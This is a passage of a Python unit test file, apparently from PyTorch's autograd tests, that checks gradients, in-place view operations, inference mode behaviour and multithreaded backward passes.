cond = mask_not_all_zeros((5, 5)).to(device=device)
def where(cond, x, y):
return torch.where(cond, x, y)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])
x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
gradcheck(where, [cond, x, y], raise_exception=True)
gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
scalar = 4.
cond = mask_not_all_zeros((5, 5)).to(device=device)
def where_scalar_first(cond, x):
return torch.where(cond, scalar, x)
def where_scalar_second(cond, x):
return torch.where(cond, x, scalar)
gradcheck(where_scalar_first, (cond, x))
gradgradcheck(where_scalar_first, (cond, x))
gradcheck(where_scalar_second, (cond, x))
gradgradcheck(where_scalar_second, (cond, x))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
# In the end the memory usage should remain equal, because neither of
# (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong type raises
with self.assertRaisesRegex(TypeError, "expected to be a Tensor or None"):
x.grad = 0
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml;
# there was a bug where bfloat16 was not recognized as floating point.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
def test_copy_forward_ad_broadcasting(self, device):
# copy_ allows the src to have a different shape from self as long as src is
# broadcastable to self. Make sure forward AD handles this case.
primal = torch.rand(3, 3, device=device)
tangent = torch.rand(3, 3, device=device)
non_dual = torch.rand(1, 3, 3, device=device)
with fwAD.dual_level():
dual = fwAD.make_dual(primal, tangent)
non_dual.copy_(dual)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
# Reentrant starts on GPU thread, finishes on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
# Reentrant starts on GPU thread, finishes on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec,))
gradgradcheck(fn, (vec,))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
# (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
# Just make sure the op doesn't raise an error
# and resulting tensor has requires_grad=False.
x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
out = torch.isin(x, torch.tensor([2, 3], device=device))
self.assertFalse(out.requires_grad)
x = torch.randn(3, 3, requires_grad=True)
out = torch.signbit(x)
self.assertFalse(out.requires_grad)
def test_warning_in_backward(self, device):
# Test that warnings raised during backward are always propagated as python warnings (gh-50209)
# NOTE: For device=cuda, warning gets propagated from a worker thread
a = torch.zeros((), device=device, requires_grad=True)
b = torch._C._nn._test_warn_in_autograd(a)
with self.assertWarnsRegex(UserWarning, "Warn from backward"):
b.backward()
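# Tests for torch.inference_mode(): creation of inference tensors, their
# view/inplace semantics, and how they interact with normal autograd tensors.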
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
for mode in (True, False):
@torch.inference_mode(mode)
def func(x):
self.assertEqual(torch.is_inference_mode_enabled(), mode)
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(not mode or torch.is_inference(d))
self.assertEqual(d.requires_grad, requires_grad and not mode)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a non-view operation produces an inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# performing a view operation produces an inference tensor
# that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# with requires_grad=True the inplace op would instead hit the generic
# "a leaf Variable that requires grad is being used in an in-place operation"
# error, so that case is not exercised here
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
tmp.add_(2)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
# Accessing is_leaf in python tries to update grad_fn and raises:
# A view was created in inference mode and its base or
# another view of its base has been modified inplace in normal mode
# tmp.is_leaf
self.assertEqual(a._version, tmp._version)
def test_normal_tensor_view_output_in_normal_mode(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
self.assertTrue(out.is_leaf)
tmp = functional_op(out)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
out.add_(2)
pass
else:
out.add_(2)
tmp = out.view(2, 3)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
def test_mix_inference_and_normal_tensor_functional_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# add is safe since it doesn't save any variable for backward
out = c.add(s)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
if requires_grad:
# leaf inference tensor with requires_grad=True can still have gradient
out.backward(torch.ones_like(out))
self.assertEqual(c.grad, torch.ones_like(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
c * s
# inference tensor in TensorList input
inputs = [s, c]
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.stack(inputs)
def test_mix_inference_and_normal_tensor_inplace_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
c = torch.ones(1, 2, 3)
self.assertTrue(torch.is_inference(c))
if requires_grad:
err_msg = "Inference tensors cannot be saved for backward"
with self.assertRaisesRegex(RuntimeError, err_msg):
a.mul_(c)
# inference tensor in TensorList input
err_msg = ("out=... arguments don't support automatic differentiation, "
"but one of the arguments requires grad")
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
else:
a.mul_(c)
err_msg = "Inplace update to inference tensor outside InferenceMode is not allowed"
with self.assertRaisesRegex(RuntimeError, err_msg):
torch.mul(s, s, out=c)
def test_mix_inference_and_normal_tensor_view_op(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
with torch.inference_mode():
c = torch.ones(1, 2, 3)
# view_as is a composite op which calls view with only one
# tensor argument, so there is no mixed inference / normal
# tensor input scenario for view ops
tmp1 = c.view_as(s)
self.assertTrue(torch.is_inference(tmp1))
self.assertFalse(tmp1.requires_grad)
# this is fine since it is equivalent to s.view(c.sizes()), which
# isn't a mixed input scenario
tmp2 = s.view_as(c)
self.assertFalse(torch.is_inference(tmp2))
self.assertEqual(tmp2.requires_grad, requires_grad)
def test_inference_mode_handle_direct_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view_as(a)
if requires_grad:
err_msg = "A view was created in inference mode and is being modified inplace"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(view_out)
pass
else:
fn(view_out)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_handle_indirect_view_on_rebase(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
view_out = a.view(-1)
fn(a)
if requires_grad:
err_msg = "A view was created in inference mode and its base or another view "
with self.assertRaisesRegex(RuntimeError, err_msg):
view_out.grad_fn
pass
else:
view_out.grad_fn
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
class TestMultithreadAutograd(TestCase):
def _run_py_multithread_fn(self, fn, args=(), num_threads=10, kwargs=None):
class PropagatingThread(threading.Thread):
'''Helper class to propagate exception from child
thread to main thread on join.
Reference: https://stackoverflow.com/a/31614591/5602957
'''
def run(self):
self.exception = None
try:
self.ret = super(PropagatingThread, self).run()
except Exception as e:
self.exception = e
def join(self, timeout=None):
super(PropagatingThread, self).join(timeout)
if self.exception:
raise self.exception from self.exception
return self.ret
threads = []
for _ in range(num_threads):
p = PropagatingThread(target=fn, args=args)
p.start()
threads.append(p)
for p in threads:
p.join()
def test_multithreaded_exception_propagation(self):
# Test whether exceptions raised in a child thread
# are propagated to the main thread.
def fn():
self.assertTrue(False)
with self.assertRaises(AssertionError):
self._run_py_multithread_fn(fn)
def test_simple_backward(self):
# simple multithreaded backward that creates threads at the beginning of training;
# everything else (inputs, operations, etc.) is separate per thread
def train_fn():
x = torch.ones(5, 5, requires_grad=True)
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
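# y = 0.5 * (x + 3) * (x + 4) = 0.5 * (x**2 + 7*x + 12), so dy/dx = x + 3.5,
# which is the expected .grad checked below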
self.assertEqual(x.grad, x + 3.5)
self._run_py_multithread_fn(train_fn)
def test_simple_backward_same_input(self):
# simple multithreaded backward with only shared inputs (this is common
# for things like Hogwild multithreaded training with multiple CPU threads)
def train_fn_backward(x):
y = (x + 3) * (x + 4) * 0.5
y.sum().backward()
x = torch.ones(5, 5, requires_grad=True)
self._run_py_multithread_fn(train_fn_backward, (x,))
# Since we are calling backward from multiple threads
# and all threads share the same input, the concurrent
# backward calls all accumulate into the same .grad for
# each input, so the accumulated gradient should equal
# num_threads * gradient
self.assertEqual(x.grad, 10 * (x + 3.5))
def train_fn_grad(x):
y = (x + 3) * (x + 4) * 0.5
grads = torch.autograd.grad(y.sum(), x)
self.assertEqual(len(grads), 1)
self.assertEqual(grads[0], x + 3.5)
# since we use the functional grad() API, gradients are not
# accumulated into .grad, and each thread should see the same result
self._run_py_multithread_fn(train_fn_grad, (x,))
def test_multithread_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
def registers_hooks_for_each_thread():
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
x = torch.ones(5, 5, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
y = x * x
# should raise two warnings from x being saved twice
self.assertEqual(len(w), 2)
y.sum().backward()
self._run_py_multithread_fn(registers_hooks_for_each_thread)
def test_dataparallel_saved_tensors_hooks(self):
def pack(x):
warnings.warn("pack")
return x
_self = self
class Model(torch.nn.Module):
def forward(self, x):
with warnings.catch_warnings(record=True) as w:
y = x * x
if torch.cuda.device_count() >= 2:
# DataParallel calls forward in different threads
# without propagating TLS, so hooks should not be called here
_self.assertEqual(len(w), 0)
else:
# DataParallel only uses one thread
# so hooks should be called here
_self.assertGreater(len(w), 0)
x = torch.ones(5, 5, requires_grad=True)
model = torch.nn.DataParallel(Model())
with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
model(x)
with warnings.catch_warnings(record=True) as w:
y = x * x
# hooks should be called here
_self.assertGreater(len(w), 0)
def test_python_thread_in_middle(self):
# A user might write a network that starts on one CPU thread, then runs its second half
# concurrently with other threads (either via python threading or fork/join calls),
# then calls backward()/grad() on BOTH threads, like a Y pattern from input at the
# bottom to output at the top. This way part of the GraphTask is shared across
